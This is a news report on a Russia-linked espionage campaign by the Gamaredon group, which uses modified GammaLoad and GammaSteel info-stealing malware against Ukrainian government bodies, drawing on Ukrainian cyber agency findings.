Russian Hackers Focused on Espionage, Not System DestructionRussia-Linked Hackers Deploying Modified GammaLoad Info Stealer Malware
While malicious wipers have stolen most of the headlines in the Russia-Ukraine cyberwar, investigators say Russians are now using modified GammaLoad and GammaSteel info stealer malware to spy on compromised government employee accounts and avoid detection. The attack begins with a phishing email.
Unlike previous Russian-sponsored campaigns deployed to disrupt the Ukrainian information infrastructure, the new campaign focuses on espionage and uses two recently modified malware variants to avoid detection, says the State Cyber Protection Center of Ukraine.
Targets of the campaign include Ukrainian state authorities and critical information infrastructure entities, according to the State Cyber Defense Center.
Tracked by the center as UAC-0010, the advanced persistent threat group is also known as Gamaredon, Armageddon and Primitive Bear.
Ukraine has previously linked the hacker group to the Office of the FSB of Russia in the Republic of Crimea and the city of Sevastopol. Operational since 2014, the group consists of regular officers of the FSB and some former law enforcement officers of Ukraine, according to a technical report by the Security Service of Ukraine.
Gamaredon is traditionally known to use VBScript, VBA Script, C#, C++, PowerShell and .NET programming languages to write the malicious malware code. Its malware targets Windows, Linux and Android operating systems.
The threat group previously used several notable malware strains, including EvilGnome, Pterodo or Pteranodon, and PseudoSteel, but in the first half of 2022 - according to a report by the Computer Emergency Response Team of Ukraine, Gamaredon began deploying GammaLoad and GammaSteel info stealer malware via phishing mails sent from compromised government employee accounts.
"The purpose of the attackers, among other things, is to steal files with a specified list of extensions, as well as authentication data of internet browsers," CERT-UA said at the time.
The latest report, however, says that threat group has redeveloped and modified these malware variants to support multistage download and deployment of malware payloads. This helps the malware analyzed in the latest campaigns to stay undetected and maximizes the chance of maintaining persistence.
The phishing emails in the latest campaign are sent from domains associated with legitimate organizations, such as the Security Service of Ukraine, according to the report.
The emails contain malicious LNK files stored in RAR archives. Only users with Ukrainian IP addresses are able to open these files.
All analyzed GammaLoad variants are VBScript droppers that use Base-64 encoding and text string replacement obfuscation techniques. They are designed to abuse trusted, signed system utilities - such as WMI, mshta.exe, wscript.exe and powershell.exe - in order to maintain persistence and download the next-stage payloads.
Similarly, all analyzed GammaSteel malwares are PowerShell scripts, designed to identify valuable information on the victim's system and, if needed, perform additional operations such as sending screen captures along with system information to Gamaredon's command-and-control server.
"Analyzing the actions performed on the infected host after gaining the opportunity to execute PowerShell commands, we can conclude that adversaries are focused more on espionage," the report says.